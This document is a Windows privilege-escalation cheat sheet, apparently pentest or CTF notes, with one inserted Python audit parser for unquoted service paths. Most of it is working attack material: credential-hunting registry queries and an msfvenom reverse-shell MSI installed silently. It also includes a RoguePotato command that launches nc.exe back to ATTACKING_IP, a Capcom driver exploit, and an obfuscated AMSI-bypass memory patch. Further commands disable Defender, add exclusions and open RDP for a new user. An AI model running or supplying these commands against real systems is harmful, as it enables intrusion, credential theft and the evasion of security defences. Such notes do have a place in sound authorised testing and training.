Windows
System enumeration
hostname
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" # /B Matches the text pattern if it is at the beginning of a line.
wmic qfe # extract patches (KB), wmic = windows management instrumentation cmd line, qfe = quick fix engineering
wmic qfe get Caption,Description,HotFixID,InstalledOn # extract patches with these specific columns
wmic logicaldisk
wmic logicaldisk get caption,description,providername # check whether other drives exist
Users enumeration
whoami /all
net users
net user administrator
wmic useraccount list brief # includes SID
net localgroup
net localgroup administrators
Network enumeration
ipconfig
ipconfig /all
arp -a
route print
netstat -ano
# fport supports Windows NT4, Windows 2000 and Windows XP
# fport reports all open TCP/IP and UDP ports and maps them to the owning application.
Fport.exe /p
Antivirus and Firewall enumeration
sc query windefend # sc = service control, windefend is the default windows antivirus
sc queryex type= service # all the services running, search for AV such as sophos, avast...
netsh advfirewall firewall dump # modern command, show firewall state
netsh firewall show state # old command
netsh firewall show config
Account lockout
PowerShell Enumeration
Tools
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
- https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Kernel Exploit
- https://github.com/SecWiki/windows-kernel-exploits
- https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
python2 windows-exploit-suggester.py --update
python2 windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
Password Hunting
Enumerate folders
tree /f /a # run in the Users directory
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt *.conf* # search for file contents
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* # search filename
Unattend files
PowerShell history
type C:\Users\theuser\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Unmounted volumes
Search registry
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
mRemoteNG
- https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
HiveNightmare
- https://github.com/GossiTheDog/HiveNightmare
Stored credentials
WSL
wsl whoami
./ubuntu1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
Registry
Autorun
Always Install Elevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$VPN LPORT=443 -f msi -o rev.msi
msiexec /quiet /qn /i C:\Windows\Tasks\rev.msi
Drivers
- The driver directory is usually C:\Windows\System32\DRIVERS, but it is sometimes under "C:\Program Files". Drivers ship with an .inf file.
Compile C/C++ code on Windows: https://www.mingw-w64.org/
Impersonation Privileges
Restore Privileges
- This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
- https://github.com/itm4n/FullPowers
SeImpersonatePrivilege
- https://jlajara.gitlab.io/Potatoes_Windows_Privesc
- Sweet Potato to rule them all: https://github.com/CCob/SweetPotato
- If the machine is < Windows 10 1809 / < Windows Server 2019: https://github.com/ohpe/juicy-potato/
- test for CLSID: https://github.com/ohpe/juicy-potato/tree/master/CLSID
- If the machine is >= Windows 10 1809 / Windows Server 2019: https://github.com/antonioCoco/RoguePotato
# On attacking machine
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
# On victim machine
.\RoguePotato.exe -r ATTACKING_IP -e "C:\Windows\Tasks\nc.exe ATTACKING_IP 1234 -e cmd.exe" -l 9999
- https://github.com/itm4n/PrintSpoofer
SeLoadDriver
- Explanation: https://www.tarlogic.com/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
- Walkthrough : https://0xdf.gitlab.io/2020/10/31/htb-fuse.html#priv-svc-print--system
- Load the vulnerable driver : https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
- Capcom.sys, a vulnerable driver : https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
- Exploit Capcom : https://github.com/tandasat/ExploitCapcom
Compile the files with Visual Studio (Release / x64 -> Build); remove the include of "stdafx.h" if it causes an error. First modify the TCHAR CommandLine[] = TEXT("C:\Windows\system32\cmd.exe"); that the exploit launches, replacing it with a reverse shell generated with msfvenom. Then load and exploit the vulnerable driver.
./EoPLoadDriver.exe System\CurrentControlSet\MyService C:\Users\svc-print\Capcom.sys
./ExploitCapcom.exe
Unquoted Service Paths
- When the path is not quoted (e.g. C:\Program files\soft\new folder\exec.exe), Windows will first try to execute 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'.
# find unquoted service
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# check if running as system or admin
sc qc <service_name>
# check path
icacls <service_path>
# After creating the binary or replacing it with a malicious one
# if start type is Auto, you need SeShutdownPrivilege to reboot
shutdown /r /t 0
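As an added audit example that is not part of these notes: a Python parser over constructed `wmic service get name,displayname,pathname,startmode` output that applies the same filters as the one-liner above and lists, for each flagged service, the intermediate paths Windows would probe (the directories to then check with icacls). The sample output and service names are constructed.

```python
import re

# Constructed sample of `wmic service get name,displayname,pathname,startmode`
# output (not captured from a real host); columns are separated by 2+ spaces.
SAMPLE_WMIC = r"""
Name       DisplayName          PathName                                            StartMode
Spooler    Print Spooler        C:\Windows\System32\spoolsv.exe                     Auto
VulnSvc    Vulnerable Service   C:\Program Files\soft\new folder\exec.exe -k arg    Auto
GoodSvc    Good Service         "C:\Program Files\soft\new folder\exec.exe" -k arg  Auto
ManualSvc  Manual Service       C:\Program Files\soft\other folder\svc.exe          Manual
"""


def intermediate_paths(path):
    """Return the executables Windows would try, in order, for an unquoted
    path: each prefix ending at a space gets '.exe' appended, until the real
    executable (the first prefix already ending in .exe) is reached."""
    tokens = path.strip().split(" ")
    tried = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            tried.append(prefix)
            break
        tried.append(prefix + ".exe")
    return tried


def find_unquoted_services(wmic_output):
    """Apply the same filters as the wmic | findstr one-liner (Auto start,
    outside the Windows directory, no quotes) and keep only services whose
    executable path actually contains a space; the directory of each
    candidate path is what to check with icacls afterwards."""
    lines = [ln.strip() for ln in wmic_output.splitlines() if ln.strip()]
    findings = []
    for line in lines[1:]:  # skip the header row
        fields = re.split(r"\s{2,}", line)
        if len(fields) != 4:
            continue
        name, _display, path, startmode = fields
        if startmode.lower() != "auto" or '"' in path:
            continue
        if path.lower().startswith(r"c:\windows"):
            continue
        tried = intermediate_paths(path)
        if len(tried) > 1:  # one candidate means no space before the .exe
            findings.append({"name": name, "path": path, "tried": tried})
    return findings


if __name__ == "__main__":
    for f in find_unquoted_services(SAMPLE_WMIC):
        print(f["name"], "->", " | ".join(f["tried"]))
```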
Localhost services
Chisel
- https://github.com/jpillora/chisel
Access port 8888 on the victim's localhost from the attacking machine
./chisel_1.7.7_linux_amd64 server -p 9876 --reverse # attacking machine
./chisel_1.7.7_windows_amd64 client 10.10.14.20:9876 R:8888:127.0.0.1:8888 # victim machine
AMSI bypass
- https://badoption.eu/blog/2023/07/15/divideconqer.html
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$k = [Win32]
$a = "axmxsxix.xdxlxlx".Replace("x","")
$LoadLibrary = $k::LoadLibrary($a)
$b= "AxmxsxixSxcxaxnxBxuxfxfxexrx".Replace("x","")
$Address = $k::GetProcAddress($LoadLibrary, $b)
$p = 0
$k::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
$x = [System.Runtime.InteropServices.Marshal]
$x::Copy($Patch, 0, $Address, 6)
Add admin account Windows
Add exclusions
Set-MpPreference -DisableRealTimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning 1
Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
Set-MpPreference -ExclusionProcess "legit.txt","powershell.exe","msbuild.exe"
Bypass UAC
- https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
Enable RDP from CLI
- https://support.moonpoint.com/os/windows/software/remote-control/rdp/rdp-registry.php
net localgroup "Remote Desktop Users" /add pentest
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netstat -ano | find "3389"
netsh firewall set portopening protocol = TCP port = 3389 name = "RDP" mode = ENABLE scope = CUSTOM $LHOST
rdesktop $IP -u pentest -p Pentest1!
Admin to System
- https://twitter.com/cyb3rops/status/1448208520680284164